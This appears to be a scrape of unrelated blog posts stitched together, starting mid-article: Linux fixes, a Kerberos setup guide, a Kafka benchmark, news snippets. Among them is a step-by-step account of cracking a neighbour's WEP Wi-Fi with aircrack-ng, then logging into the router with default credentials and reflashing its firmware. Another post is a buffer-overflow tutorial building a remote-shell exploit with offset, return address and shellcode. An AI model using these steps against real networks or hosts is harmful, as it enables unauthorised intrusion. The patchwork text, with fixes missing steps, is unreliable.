Like many security tools, Foca can be used for good or bad. It depends on who extracts the required information first, the administrator or the attacker. Ideally an administrator would not only locally analyze documents before release, but also go a step further and implement a security policy within the organization to make sure such Metadata content is minimized (or falsified). But it is surprising how the power of the information contained in Metadata has been belittled and ignored. A reason for this may be that there are more direct threats to security that administrators would rather focus their attention on than small bits of information in the Metadata. But remember: if hackers have the patience to go ‘Dumpster Diving’, they will surely go for Metadata analysis, and an administrator’s ignorance is the hacker’s bliss.

On the Web

●                     http://www.informatica64.com/ – Foca Official Website

          'Device Not Managed' by NetworkManager - Debian / Ubuntu / Kali Linux | Problem [Solved]        
Written by Pranshu Bajpai

Problem Scenario:

When you install a fresh copy of Kali Linux / Debian / Ubuntu, you may be plagued by this error, which won't let you connect to the 'Wired' network. The wireless interface (wlan0) might work just fine, but under the 'Wired' network it says 'Device not managed'.


If this interface appears in '/etc/network/interfaces' file, Network Manager won't manage it by default and we need to change this behavior.

To do this, make modifications in the file:
#vi /etc/NetworkManager/NetworkManager.conf
Change 'managed=false' to 'managed=true'

Now restart the Network Manager
#service network-manager restart
You should see 'Auto Ethernet' appear under the 'Wired' header in the Network Manager now and would be able to connect to it.
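For reference, the line lives in the [ifupdown] section of the file; on a stock Debian/Kali install, NetworkManager.conf should read roughly as follows after the edit:

```
[main]
plugins=ifupdown,keyfile

[ifupdown]
managed=true
```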
          How To Recover Grub After Installing Windows | Ubuntu / Kali / Debian Linux        
Written by Pranshu Bajpai

A Little Rant

It's 2014 and Windows still assumes that it's the only OS out there.

When you install Windows and then install Linux, you will find Windows properly accounted for in the grub boot menu: grub recognizes Windows and creates an entry for it.

Should we assume Microsoft likes bullying? There is no apparent technical reason why they won't make a Windows boot loader that recognizes Linux and creates an entry for it in the boot menu.

So if you have Linux and then install Windows, its nasty boot manager removes the Linux entry, and all you will see at boot time is Windows, with no entry for Linux.

Kali Linux is the primary OS that I use on my laptop. I rarely ever use Windows, so I removed it altogether. However, I was developing an app for Windows and needed to code against the Windows SDK (Visual Studio), since I needed some libraries like 'wlanapi' that weren't present in Linux IDEs.

Long story short, I installed Windows on top of Kali and as I expected, it removed the entry to Kali from the boot menu.

Here are a few commands that I used to solve this issue. This is by far the easiest way to bring the Linux / Ubuntu / Kali boot entry back.

How To Recover Grub (Kali Linux Boot Menu Entry) After Installing Windows 

For this you need:

1. Ubuntu (or Any linux) Live CD / USB
2. Eyes to read and Fingers to Type some commands 

Step 1. Boot from the Ubuntu / Kali / Fedora (any linux) live disk OR USB

Step 2. After the 'Live CD Desktop' loads up, Find Terminal.

Step 3. After the Terminal comes up. Type the following commands:

#sudo mount /dev/sda10 /mnt 

#Note that here the root ( / ) of my Kali Linux was on device '/dev/sda10'. For you this will be different; check it under 'Disk Manager' in your Live CD. You are looking for the device name of your Linux root partition

#for i in /sys /proc /run /dev; do sudo mount --bind "$i" "/mnt$i"; done

#sudo chroot /mnt


#grub-install /dev/sda


Step 4. That's it. Exit the Terminal and reboot.

You should now see Grub restored. This is one of the easiest and quickest ways to restore grub after installing Windows.

Note that sometimes you may lose the entry for your Windows OS after these steps. But all you need to do is run these 3 commands to get it back:

#apt-get install os-prober
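Only the first of the three commands survived above; on Debian-based systems, the standard sequence to re-detect Windows and regenerate the menu is typically:

```shell
apt-get install os-prober   # tool that scans disks for other operating systems
os-prober                   # detect the Windows installation
update-grub                 # regenerate grub.cfg, now including a Windows entry
```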






I recently lost the Linux grub again after installing Windows 7 on my laptop, and this time I decided to try an ISO called 'boot-repair disk'. I had heard a lot about it, and it seems to be the tool of choice for people who don't want to get their hands dirty in the Linux terminal.

The tool is pretty good in that it does what it is meant for, without any glitches. This is all you have to do:

1. Download 'boot-repair disk' ISO
2. Burn it to a CD or make a bootable Pendrive
3. Boot into the boot-repair disk ISO

After that, it is all automated. As soon as you boot into this live disk, it will automatically begin mounting all your file systems and looking for grub. Once it is located, it will be restored automatically and at the end a message will be displayed to you.

So if you are someone who isn't all that thrilled about typing commands on a Linux terminal in the method I discussed previously, this ISO is for you.

          Hacking Neighbour's Wifi (Password) | Hacking Neighbor's Wireless (Internet) | Step by Step How To        
Written by Pranshu Bajpai

Disclaimer: For educational purposes only: This is meant merely to exhibit the dangers of using Poor wireless security. Please note that prior to beginning the test you should seek explicit consent from the owner if the access point does not belong to you.

Hacking into a Neighbor's Wifi access point

OS: Kali Linux
Test Subject: Neighbor's WiFi Access Point
Encryption: WEP

I noticed 4 wireless access points in the vicinity. 3 of these were using WPA / WPA2, and I was in no mood for a dictionary attack on a WPA handshake, since it takes a long time and success isn't guaranteed. I found one access point using WEP security, which as you know is an outdated protocol with poor security.

I tested penetrating this WEP access point using the same Aircrack-ng Suite of tools as I have mentioned in this previous post.

Step 1: Discovered the WEP AP having SSID 'dlink'  (Notice the weak signal power from neighbor's house to mine)

Step 2: Collected the required number of Data Packets from the WEP Network. Meanwhile, I used 'aireplay-ng --arpreplay' to increase the data rate since I am not a Patient soul.

Step 3: Saved the data packets in a file called 'neighbor-01.cap' and cracked the password using 'Aircrack-ng'

The Key for the Neighbor's Wifi turned out to be: "1234567890"   -    (An easily guessable Password, just what I expected from someone using WEP Security in 2014)
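Steps 1 through 3 map onto the aircrack-ng suite roughly as follows; the BSSID, channel, and monitor interface name here are placeholders for the values airodump-ng actually shows you:

```shell
airmon-ng start wlan0                                         # put the card into monitor mode
airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 6 -w neighbor mon0   # capture WEP data packets to neighbor-01.cap
aireplay-ng --arpreplay -b AA:BB:CC:DD:EE:FF mon0             # replay ARP packets to speed up IV collection
aircrack-ng neighbor-01.cap                                   # recover the WEP key from the captured IVs
```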

Step 4: I connected to the wifi using the decrypted key, and it allocated an IP to me using DHCP.

Note: If you want a better step by step on how to hack a WiFi, check out my previous post here.

Step 5: I was connected to the Internet.

Step 6: Since I was part of their network now, curiosity got the better of me and I decided to scan the network to see who else was connected. I found 3 devices in the network:

One was my Laptop
Another one was my cellphone (I connected my cellphone to the network earlier)
And the third was the Dlink router itself.
None of the neighbor's own devices were connected to the network at the time.

nmap told me that the dlink router had an open port 80, which reminded me to check out the control panel of this dlink device.

Step 7: So I fired up my browser and went to the router's address, which opened the login panel for the dlink access point control panel.

Step 8: A quick Google search revealed that the login defaults on dlink devices are:
username: 'admin' and password: (blank)
Step 9: I tried logging in with the defaults and got access to the control panel.

(Again BAD security practice: leaving defaults unchanged!)

Step 10: I was getting weak power from the AP and decided to upgrade their firmware and see if it made a difference.

The Current firmware of the neighbor's wifi was '5.10'

I checked for latest Firmware available. It was '5.13'

I downloaded the upgrade on my machine ("DIR********.bin")

Step 11: I made a backup of the configuration of the Access point before upgrading. I saved backup 'config.bin' to my laptop from the neighbor's wifi

Step 12: I went ahead and upgraded the Firmware. I uploaded the DIR****.bin from my laptop to the access point and it went for a reboot.

I lost access to the WiFi after the upgrade.

I figured the upgraded firmware had changed the password for the WiFi, and I couldn't connect to it anymore. Moreover, since I had lost Internet access along with the WiFi, I couldn't Google the default password for the upgraded firmware either.

And I couldn't crack it either: this time no one--not even the neighbor himself--would be able to authenticate to the WiFi with the new unknown password after the firmware upgrade, so no data packets would be generated and I would have nothing to crack.

Step 13: I fired up 'Airodump-ng' again and noticed that the firmware upgrade had simply changed the access point security to "open", i.e., no password is required to connect to it.

Step 14: I connected to the "open" wifi and restored the configuration settings using the 'config.bin' backup I made earlier.

I manually selected WPA2 security and provided the same password as used earlier by my neighbor ("1234567890")

Disclaimer: Please note that I had explicit consent from the owner before commencing this test. If you do not have such permission, try it on your own access point instead; doing otherwise is illegal.

          Buffer Overflow Attack Example [Sending Shellcode] | Tutorial | Exploit Research | How To        
Written by Pranshu Bajpai

This is a demonstration of a Buffer Overflow attack to get remote shell of a Windows box.

Vulnerable Program - Server-Memcpy.exe [Resource: SecurityTube]
Vulnerable Function  - memcpy
Tools - msfpayload, Immunity Debugger

Read up on Memory layout and Stack Frames before you begin [see 'Resources' at the bottom of this page]

Buffer Overflow Attack Example and Demonstration

Testing the Vulnerability to discover the possibility of a Buffer Overflow

Get the vulnerable server running on a Windows box and note the IP.

Create an exploit in python on your Linux machine sending input to the remote vulnerable server running on the Windows box.

Send an input of  "A" * 1000 and notice the server crashing on the Windows box after receiving the first 1024 bytes.

Now load the server.exe in the Immunity Debugger and run the executable (F9).

Run the exploit on Linux box again to send an input of "A" * 1000 to crash the server on Windows box.

Notice the state of the registers and stack in the debugger after the server crashes. Notice EBP and EIP overflow and now both contain '41414141' which is hex for "AAAA".

Now we can see that we can overflow the buffer and manipulate the address stored in EIP and EBP.

Calculating the Offset using pattern_create and pattern_offset

To calculate the Offset we need 'pattern_create.rb' and 'pattern_offset.rb' included with the Metasploit Framework Toolkit

Create a Large Pattern (of 1000 bytes) using pattern_create

Copy the pattern and send it as input to the vulnerable server using the Python exploit

Check the Value of EIP in the debugger [In this case it is 6A413969]

 Search for this value in the pattern by using pattern_offset.rb

Note down the offset value = 268 [So now we understand that these first 268 bytes don't matter to us, they are just used to fill the buffer]

We are interested in the remaining bytes which will include the return address and the payload (shellcode) and optionally NOP sled.
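The pattern_create/pattern_offset pair can be approximated in a few lines of Python. This is a simplified re-implementation of the same upper/lower/digit triple scheme, not Metasploit's actual code:

```python
import itertools
import string

def cyclic_pattern(length):
    # Upper/lower/digit triples (Aa0, Aa1, ...) give a sequence whose
    # 4-byte windows are unique, so an EIP value maps back to one offset.
    triples = ("".join(t) for t in itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits))
    pattern = "".join(itertools.islice(triples, length // 3 + 1))
    return pattern[:length]

def pattern_offset(pattern, eip_value):
    # EIP 0x6A413969 read back in little-endian order is the
    # ASCII substring "i9Aj" inside the pattern.
    needle = eip_value.to_bytes(4, "little").decode()
    return pattern.find(needle)

pat = cyclic_pattern(1000)
print(pattern_offset(pat, 0x6A413969))  # 268
```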

Finding the Return Address

Now we need to find out the return address to be fed to EIP which will point to the Malicious payload (Shellcode) in the stack

We notice that the return address can be 0022FB70

In Little Endian format the return address is \x70\xFB\x22\x00
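Python's struct module gives a quick sanity check of the little-endian packing:

```python
import struct

# Pack the candidate return address 0x0022FB70 as a 32-bit
# little-endian value, exactly as it must appear in the exploit buffer.
ret = struct.pack("<I", 0x0022FB70)
print(ret.hex())  # 70fb2200
```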

Creating Payload [ Generating Shellcode for Windows box ]

Now we require the payload (shellcode). It can be generated using msfpayload

About Bad Bytes in the Shellcode or Return Address

(If you're a beginner, this might confuse you. If that's the case, skip this part as it doesn't apply for this particular example.)

Remember to remove any bad bytes if you notice them in the shellcode or return address (bytes like null, carriage return).

We notice that our return address has a byte "\x00" in the end which is a bad byte.

However, in this particular case, since the function is memcpy, the string terminator byte of "\x00" doesn't matter.

But in a function like strcpy this bad byte would terminate the string and we would have to use address of a JUMP ESP as return address.
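A quick bad-byte scan can be folded into the exploit script. The byte set below is only a common default; the real set depends on the vulnerable function:

```python
BAD_BYTES = {0x00, 0x0a, 0x0d}  # null, line feed, carriage return

def bad_byte_positions(data):
    # Return the offsets of any bad bytes found in the payload.
    return [i for i, b in enumerate(data) if b in BAD_BYTES]

ret = b"\x70\xFB\x22\x00"
print(bad_byte_positions(ret))  # [3]: the trailing null, harmless for memcpy
```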

Constructing Final Exploit Code

In the Python exploit, Send Input = 268 Random bytes (A) + Return Address (\x70\xFB\x22\x00) + Shellcode

Final Exploit Code would send the following input to the Vulnerable Server


_to_send = "A" * 268

_to_send += "\x70\xFB\x22\x00"

_to_send += "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"  # first bytes only; the full 341-byte msfpayload shellcode continues here



Exploit Successful, We got a Shell!! 0wn3d!

Send the exploit to the vulnerable server at the IP noted earlier

This spawns a shell on the Windows box, listening on port 4444

Use netcat to connect to the machine on port 4444

At server side on Windows box, the server is still running and shows that it has received 613 bytes

Do the Math

Random bytes of "A"  =  268 bytes
Return address       =    4 bytes
Payload (shellcode)  =  341 bytes

Total                =  613 bytes
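The arithmetic checks out against the 613 bytes the server reports receiving:

```python
filler = 268      # "A" padding up to the saved EIP
ret_addr = 4      # little-endian return address
shellcode = 341   # msfpayload-generated payload

total = filler + ret_addr + shellcode
print(total)  # 613
```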


Smashing The Stack for Fun and Profit - AlephOne  [It's very important to read this]

Exploit Research @ SecurityTube

Exploit Writing Tutorials at Corelan.be

          Linux Systems Administrator - McKesson - Atlanta, GA        
In-depth knowledge of VMware ESX would be preferred as well as an operational understanding of Dell PowerEdge servers....
From McKesson - Thu, 01 Jun 2017 00:56:45 GMT
          RaspyFi – Linux for Audiophiles        
RaspyFi is a new Linux distribution designed to turn the Raspberry Pi into a miniature piece of audiophile equipment. It works with many digital-to-analog converters; the full list can be found on the project's website. The idea is simple: connect your Raspberry Pi to an amplifier, sit back in an armchair with a remote (which can be any Android or iOS device) and enjoy the music being played […]
          About Valve, Steam and Linux: Linux on a Steam Console?        

A few minutes ago I read an article about Valve releasing the new Big Picture Mode for Steam (beta).

As you probably know, Valve’s porting Steam and the Source engine to Linux and there have been many assumptions about why Valve is doing this. Is it because of Windows 8 and its marketplace? Or is it just about expanding to other platforms?

Now there have been many rumors about Valve working on a Steam console.

“But how are those related to each other?” you may think.

In my opinion, there’s a pretty good chance that Valve will use Linux on their console, because:

  • They won’t need to develop everything from scratch.
  • They won’t need to pay Microsoft for Windows licenses (there have also been rumors that Valve could use Windows on their console because of the number of games that run on it).
  • They could get the Linux community on their side (well that depends on how open the Steam console would be, but getting more games on Linux itself is also a nice thing).

I also think this could attract more developers to Linux games, because it won’t just be about “developing Linux games”, but also about “developing games for Valve’s console”.

I highly appreciate discussion about this topic. If I’m wrong at some point, please tell me.

          The secure messaging app Signal surges in popularity after the US elections        

Categories: Android, iOS, Linux, Software, Mac OS, Security, Mobile telephony, Windows

Since Snowden's revelations in 2013 about the scale of the NSA's Internet surveillance systems, the general public has, on the whole, changed its habits very little. "I have nothing to hide, why would anyone spy on me?" is a reply that often comes from skeptics. […]

(Continue reading...)

          Getting Chinese input methods working in Sublime Text 3 on Ubuntu MATE        

This procedure has been verified on a system that already has Sogou Pinyin for Linux and Sublime Text 3 installed.


/* sublime_imfix.c — a reconstruction of the widely circulated LD_PRELOAD
 * shim: it wraps gtk_im_context_set_client_window() so the input-method
 * context gets focused once the editor window is realized. */
#include <gtk/gtk.h>
#include <gtk/gtkimcontext.h>

void gtk_im_context_set_client_window (GtkIMContext *context,
                                       GdkWindow    *window)
{
    GtkIMContextClass *klass;
    g_return_if_fail (GTK_IS_IM_CONTEXT (context));

    klass = GTK_IM_CONTEXT_GET_CLASS (context);
    if (klass->set_client_window)
        klass->set_client_window (context, window);

    if (!GDK_IS_WINDOW (window))
        return;

    int width = gdk_window_get_width (window);
    int height = gdk_window_get_height (window);
    if (width != 0 && height != 0)
        gtk_im_context_focus_in (context);
}




cd ~

gcc -shared -o libsublime-imfix.so sublime_imfix.c  `pkg-config --libs --cflags gtk+-2.0` -fPIC


sudo apt-get install build-essential
sudo apt-get install libgtk2.0-dev


sudo mv libsublime-imfix.so /opt/sublime_text/

sudo vim /usr/share/applications/sublime_text.desktop

[Desktop Entry]
Name=Sublime Text
GenericName=Text Editor
Comment=Sophisticated text editor for code, markup and prose
Exec=/usr/bin/subl %F        # change Exec to /usr/bin/subl (the subl wrapper script modified earlier)

[Desktop Action Window]
Name=New Window
Exec=/usr/bin/subl -n       # change Exec to /usr/bin/subl here as well

[Desktop Action Document]
Name=New File
Exec=/usr/bin/subl new_file    # and here too

If you now launch Sublime Text from the command line with /usr/bin/subl, the Chinese input method should work.
To fix the menu launcher as well, open "Control Center" -> "Main Menu", find "Programming" under the "Applications" tree, locate "Sublime Text", and change its command to:
/usr/bin/subl %F

SIMONE 2016-08-19 17:53

          Maven dependency packaging plugin        




<!-- generate launch scripts for both Linux and Windows -->
<!-- root directory -->
<!-- the built jar, along with the Maven dependency jars, goes into this directory -->
<!-- directory for the executable scripts -->
<!-- target directory for configuration files -->
<!-- copy configuration files into the directory above -->
<!-- where to copy configuration files from (default: src/main/config) -->
<!-- layout of the jars in the lib directory: the default is a ${groupId}/${artifactId} directory structure; "flat" puts the jars directly in lib -->
<!-- main class -->


<move todir="${project.build.directory}/${project.artifactId}-${version}/com/duxiu/demo/app">
  <fileset dir="${project.build.directory}/classes/com/duxiu/demo/app">
    <include name="*.class" />
  </fileset>
</move>

SIMONE 2016-07-20 09:42

          Ubuntu Kerberos configuration        



Kerberos is a network authentication system based on the principle of a trusted third party, the other two parties being the user and the service the user wishes to authenticate to. Not all services and applications can use Kerberos, but for those that can, it brings the network environment one step closer to being Single Sign On (SSO).

This section covers installation and configuration of a Kerberos server, and some example client configurations.


If you are new to Kerberos there are a few terms that are good to understand before setting up a Kerberos server. Most of the terms will relate to things you may be familiar with in other environments:

  • Principal: any users, computers, and services provided by servers need to be defined as Kerberos Principals.

  • Instances: are used for service principals and special administrative principals.

  • Realms: the unique realm of control provided by the Kerberos installation. Usually the DNS domain converted to uppercase (EXAMPLE.COM).

  • Key Distribution Center: the KDC consists of three parts: a database of all principals, the authentication server, and the ticket granting server. For each realm there must be at least one KDC.

  • Ticket Granting Ticket: issued by the Authentication Server (AS), the Ticket Granting Ticket (TGT) is encrypted using the user's password, which is known only to the user and the KDC.

  • Ticket Granting Server: (TGS) issues service tickets to clients upon request.

  • Tickets: confirm the identity of the two principals. One principal being a user and the other a service requested by the user. Tickets establish an encryption key used for secure communication during the authenticated session.

  • Keytab Files: are files extracted from the KDC principal database and contain the encryption key for a service or host.

To put the pieces together, a Realm has at least one KDC, preferably two for redundancy, which contains a database of Principals. When a user principal logs into a workstation, configured for Kerberos authentication, the KDC issues a Ticket Granting Ticket (TGT). If the user supplied credentials match, the user is authenticated and can then request tickets for Kerberized services from the Ticket Granting Server (TGS). The service tickets allow the user to authenticate to the service without entering another username and password.

Kerberos Server


Before installing the Kerberos server a properly configured DNS server is needed for your domain. Since the Kerberos Realm by convention matches the domain name, this section uses the example.com domain configured in the section called “Primary Master”.

Also, Kerberos is a time sensitive protocol. So if the local system time between a client machine and the server differs by more than five minutes (by default), the workstation will not be able to authenticate. To correct the problem all hosts should have their time synchronized using the Network Time Protocol (NTP). For details on setting up NTP see the section called “Time Synchronisation with NTP”.

The first step in installing a Kerberos Realm is to install the krb5-kdc and krb5-admin-server packages. From a terminal enter:

sudo apt-get install krb5-kdc krb5-admin-server 

You will be asked at the end of the install to supply a name for the Kerberos and Admin servers, which may or may not be the same server, for the realm.

Next, create the new realm with the krb5_newrealm utility:

sudo krb5_newrealm 


The questions asked during installation are used to configure the /etc/krb5.conf file. If you need to adjust the Key Distribution Center (KDC) settings simply edit the file and restart the krb5-kdc daemon.

  1. Now that the KDC is running, an admin user is needed. It is recommended to use a username different from your everyday username. Using the kadmin.local utility, in a terminal prompt enter:

    sudo kadmin.local
    Authenticating as principal root/admin@EXAMPLE.COM with password.
    kadmin.local: addprinc steve/admin
    WARNING: no policy specified for steve/admin@EXAMPLE.COM; defaulting to no policy
    Enter password for principal "steve/admin@EXAMPLE.COM":
    Re-enter password for principal "steve/admin@EXAMPLE.COM":
    Principal "steve/admin@EXAMPLE.COM" created.
    kadmin.local: quit

    In the above example steve is the Principal, /admin is an Instance, and @EXAMPLE.COM signifies the realm. The "every day" Principal would be steve@EXAMPLE.COM, and should have only normal user rights.


    Replace EXAMPLE.COM and steve with your Realm and admin username.

  2. Next, the new admin user needs to have the appropriate Access Control List (ACL) permissions. The permissions are configured in the /etc/krb5kdc/kadm5.acl file:

    steve/admin@EXAMPLE.COM        * 

    This entry grants steve/admin the ability to perform any operation on all principals in the realm.

  3. Now restart the krb5-admin-server for the new ACL to take effect:

    sudo /etc/init.d/krb5-admin-server restart 
  4. The new user principal can be tested using the kinit utility:

    kinit steve/admin
    steve/admin@EXAMPLE.COM's Password:

    After entering the password, use the klist utility to view information about the Ticket Granting Ticket (TGT):

    klist
    Credentials cache: FILE:/tmp/krb5cc_1000
            Principal: steve/admin@EXAMPLE.COM

      Issued           Expires          Principal
    Jul 13 17:53:34  Jul 14 03:53:34  krbtgt/EXAMPLE.COM@EXAMPLE.COM

    You may need to add an entry to /etc/hosts for the KDC. For example:

        kdc01.example.com       kdc01

    Replacing with the IP address of your KDC.

  5. In order for clients to determine the KDC for the Realm some DNS SRV records are needed. Add the following to /etc/bind/db.example.com:

    _kerberos._udp.EXAMPLE.COM.     IN SRV 1  0 88  kdc01.example.com.
    _kerberos._tcp.EXAMPLE.COM.     IN SRV 1  0 88  kdc01.example.com.
    _kerberos._udp.EXAMPLE.COM.     IN SRV 10 0 88  kdc02.example.com.
    _kerberos._tcp.EXAMPLE.COM.     IN SRV 10 0 88  kdc02.example.com.
    _kerberos-adm._tcp.EXAMPLE.COM. IN SRV 1  0 749 kdc01.example.com.
    _kpasswd._udp.EXAMPLE.COM.      IN SRV 1  0 464 kdc01.example.com.

    Replace EXAMPLE.COM, kdc01, and kdc02 with your domain name, primary KDC, and secondary KDC.

    See Chapter 7, Domain Name Service (DNS) for detailed instructions on setting up DNS.

Your new Kerberos Realm is now ready to authenticate clients.

Secondary KDC

Once you have one Key Distribution Center (KDC) on your network, it is good practice to have a Secondary KDC in case the primary becomes unavailable.

  1. First, install the packages, and when asked for the Kerberos and Admin server names enter the name of the Primary KDC:

    sudo apt-get install krb5-kdc krb5-admin-server 
  2. Once you have the packages installed, create the Secondary KDC's host principal. From a terminal prompt, enter:

    kadmin -q "addprinc -randkey host/kdc02.example.com" 

    After issuing any kadmin command you will be prompted for your username/admin@EXAMPLE.COM principal password.

  3. Extract the keytab file:

    kadmin -q "ktadd -k keytab.kdc02 host/kdc02.example.com" 
  4. There should now be a keytab.kdc02 in the current directory; move the file to /etc/krb5.keytab:

    sudo mv keytab.kdc02 /etc/krb5.keytab 

    If the path to the keytab.kdc02 file is different adjust accordingly.

    Also, you can list the principals in a Keytab file, which can be useful when troubleshooting, using the klist utility:

    sudo klist -k /etc/krb5.keytab 
  5. Next, there needs to be a kpropd.acl file on each KDC that lists all KDCs for the Realm. For example, on both primary and secondary KDC, create /etc/krb5kdc/kpropd.acl:

    host/kdc01.example.com@EXAMPLE.COM
    host/kdc02.example.com@EXAMPLE.COM
  6. Create an empty database on the Secondary KDC:

    sudo kdb5_util create -s 
  7. Now start the kpropd daemon, which listens for connections from the kprop utility. kprop is used to transfer dump files:

    sudo kpropd -S 
  8. From a terminal on the Primary KDC, create a dump file of the principal database:

    sudo kdb5_util dump /var/lib/krb5kdc/dump 
  9. Extract the Primary KDC's keytab file and copy it to /etc/krb5.keytab:

    kadmin -q "ktadd -k keytab.kdc01 host/kdc01.example.com"
    sudo mv keytab.kdc01 /etc/krb5.keytab

    Make sure there is a host principal for kdc01.example.com before extracting the keytab.

  10. Using the kprop utility push the database to the Secondary KDC:

    sudo kprop -r EXAMPLE.COM -f /var/lib/krb5kdc/dump kdc02.example.com 

    There should be a SUCCEEDED message if the propagation worked. If there is an error message check /var/log/syslog on the secondary KDC for more information.

    You may also want to create a cron job to periodically update the database on the Secondary KDC. For example, the following will push the database every hour:

    # m h  dom mon dow   command
    0 * * * * /usr/sbin/kdb5_util dump /var/lib/krb5kdc/dump && /usr/sbin/kprop -r EXAMPLE.COM -f /var/lib/krb5kdc/dump kdc02.example.com
  11. Back on the Secondary KDC, create a stash file to hold the Kerberos master key:

    sudo kdb5_util stash 
  12. Finally, start the krb5-kdc daemon on the Secondary KDC:

    sudo /etc/init.d/krb5-kdc start 

The Secondary KDC should now be able to issue tickets for the Realm. You can test this by stopping the krb5-kdc daemon on the Primary KDC, then use kinit to request a ticket. If all goes well you should receive a ticket from the Secondary KDC.

Kerberos Linux Client

This section covers configuring a Linux system as a Kerberos client. This will allow access to any kerberized services once a user has successfully logged into the system.


In order to authenticate to a Kerberos Realm, the krb5-user and libpam-krb5 packages are needed, along with a few others that are not strictly necessary but make life easier. To install the packages enter the following in a terminal prompt:

sudo apt-get install krb5-user libpam-krb5 libpam-ccreds auth-client-config 

The auth-client-config package allows simple configuration of PAM for authentication from multiple sources, and the libpam-ccreds will cache authentication credentials allowing you to login in case the Key Distribution Center (KDC) is unavailable. This package is also useful for laptops that may authenticate using Kerberos while on the corporate network, but will need to be accessed off the network as well.


To configure the client in a terminal enter:

sudo dpkg-reconfigure krb5-config 

You will then be prompted to enter the name of the Kerberos Realm. Also, if you don't have DNS configured with Kerberos SRV records, the menu will prompt you for the hostname of the Key Distribution Center (KDC) and Realm Administration server.

The dpkg-reconfigure adds entries to the /etc/krb5.conf file for your Realm. You should have entries similar to the following:

[libdefaults]
        default_realm = EXAMPLE.COM
...
[realms]
        EXAMPLE.COM = {
                kdc =
                admin_server =
        }

You can test the configuration by requesting a ticket using the kinit utility. For example:

kinit steve@EXAMPLE.COM
Password for steve@EXAMPLE.COM:

When a ticket has been granted, the details can be viewed using klist:

klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: steve@EXAMPLE.COM

Valid starting     Expires            Service principal
07/24/08 05:18:56  07/24/08 15:18:56  krbtgt/EXAMPLE.COM@EXAMPLE.COM
        renew until 07/25/08 05:18:57

Kerberos 4 ticket cache: /tmp/tkt1000
klist: You have no tickets cached

Next, use the auth-client-config to configure the libpam-krb5 module to request a ticket during login:

sudo auth-client-config -a -p kerberos_example 

You should now receive a ticket upon successful login.


SIMONE 2016-07-05 11:37 发表评论

          Benchmarking Apache Kafka: 2 Million Writes Per Second (On Three Cheap Machines)        

I wrote a blog post about how LinkedIn uses Apache Kafka as a central publish-subscribe log for integrating data between applications, stream processing, and Hadoop data ingestion.

To actually make this work, though, this "universal log" has to be a cheap abstraction. If you want to use a system as a central data hub it has to be fast, predictable, and easy to scale so you can dump all your data onto it. My experience has been that systems that are fragile or expensive inevitably develop a wall of protective process to prevent people from using them; a system that scales easily often ends up as a key architectural building block just because using it is the easiest way to get things built.

I've always liked the benchmarks of Cassandra that show it doing a million writes per second on three hundred machines on EC2 and Google Compute Engine. I'm not sure why, maybe it is a Dr. Evil thing, but doing a million of anything per second is fun.

In any case, one of the nice things about a Kafka log is that, as we'll see, it is cheap. A million writes per second isn't a particularly big thing. This is because a log is a much simpler thing than a database or key-value store. Indeed our production clusters take tens of millions of reads and writes per second all day long and they do so on pretty modest hardware.

But let's do some benchmarking and take a look.

Kafka in 30 seconds

To help understand the benchmark, let me give a quick review of what Kafka is and a few details about how it works. Kafka is a distributed messaging system originally built at LinkedIn and now part of the Apache Software Foundation and used by a variety of companies.

The general setup is quite simple. Producers send records to the cluster which holds on to these records and hands them out to consumers:

The key abstraction in Kafka is the topic. Producers publish their records to a topic, and consumers subscribe to one or more topics. A Kafka topic is just a sharded write-ahead log. Producers append records to these logs and consumers subscribe to changes. Each record is a key/value pair. The key is used for assigning the record to a log partition (unless the publisher specifies the partition directly).
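The key-to-partition rule described above can be sketched as follows (the real Kafka client hashes the key bytes with murmur2; Python's built-in hash is only a stand-in here):

```python
def assign_partition(key, num_partitions, explicit_partition=None):
    # A publisher-specified partition bypasses key hashing.
    if explicit_partition is not None:
        return explicit_partition
    # Otherwise the key is hashed to pick a log partition deterministically.
    return hash(key) % num_partitions

print(assign_partition("user-42", 6, explicit_partition=2))  # 2
```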

Here is a simple example of a single producer and consumer reading and writing from a two-partition topic.

This picture shows a producer process appending to the logs for the two partitions, and a consumer reading from the same logs. Each record in the log has an associated entry number that we call the offset. This offset is used by the consumer to describe its position in each of the logs.

These partitions are spread across a cluster of machines, allowing a topic to hold more data than can fit on any one machine.

Note that unlike most messaging systems the log is always persistent. Messages are immediately written to the filesystem when they are received. Messages are not deleted when they are read but retained with some configurable SLA (say a few days or a week). This allows usage in situations where the consumer of data may need to reload data. It also makes it possible to support space-efficient publish-subscribe as there is a single shared log no matter how many consumers; in traditional messaging systems there is usually a queue per consumer, so adding a consumer doubles your data size. This makes Kafka a good fit for things outside the bounds of normal messaging systems such as acting as a pipeline for offline data systems such as Hadoop. These offline systems may load only at intervals as part of a periodic ETL cycle, or may go down for several hours for maintenance, during which time Kafka is able to buffer even TBs of unconsumed data if needed.

Kafka also replicates its logs over multiple servers for fault-tolerance. One important architectural aspect of our replication implementation, in contrast to other messaging systems, is that replication is not an exotic bolt-on that requires complex configuration, only to be used in very specialized cases. Instead replication is assumed to be the default: we treat un-replicated data as a special case where the replication factor happens to be one.

Producers get back an acknowledgement containing the record's offset when they publish a message. The first record published to a partition is given the offset 0, the second record 1, and so on in an ever-increasing sequence. Consumers consume data from a position specified by an offset, and they save their position in a log by committing periodically: saving this offset in case that consumer instance crashes and another instance needs to resume from its position.
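A toy in-memory version of one partition's log illustrates the offset numbering and commit logic (Kafka, of course, persists to disk; this is only a sketch):

```python
class PartitionLog:
    """Append-only log for a single partition (illustration only)."""

    def __init__(self):
        self.records = []

    def append(self, record):
        offset = len(self.records)   # first record gets offset 0
        self.records.append(record)
        return offset                # returned in the producer acknowledgement

    def read_from(self, offset):
        # A consumer resumes reading from its last committed offset.
        return self.records[offset:]

log = PartitionLog()
assert log.append("a") == 0
assert log.append("b") == 1
committed = 1                        # consumer periodically commits its position
assert log.read_from(committed) == ["b"]
```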

Okay, hopefully that all made sense (if not, you can read a more complete introduction to Kafka here).

This Benchmark

This test is against trunk, as I made some improvements to the performance tests for this benchmark. But nothing too substantial has changed since the last full release, so you should see similar results with 0.8.1. I am also using our newly re-written Java producer, which offers much improved throughput over the previous producer client.

I've followed the basic template of this very nice RabbitMQ benchmark, but I covered scenarios and options that were more relevant to Kafka.

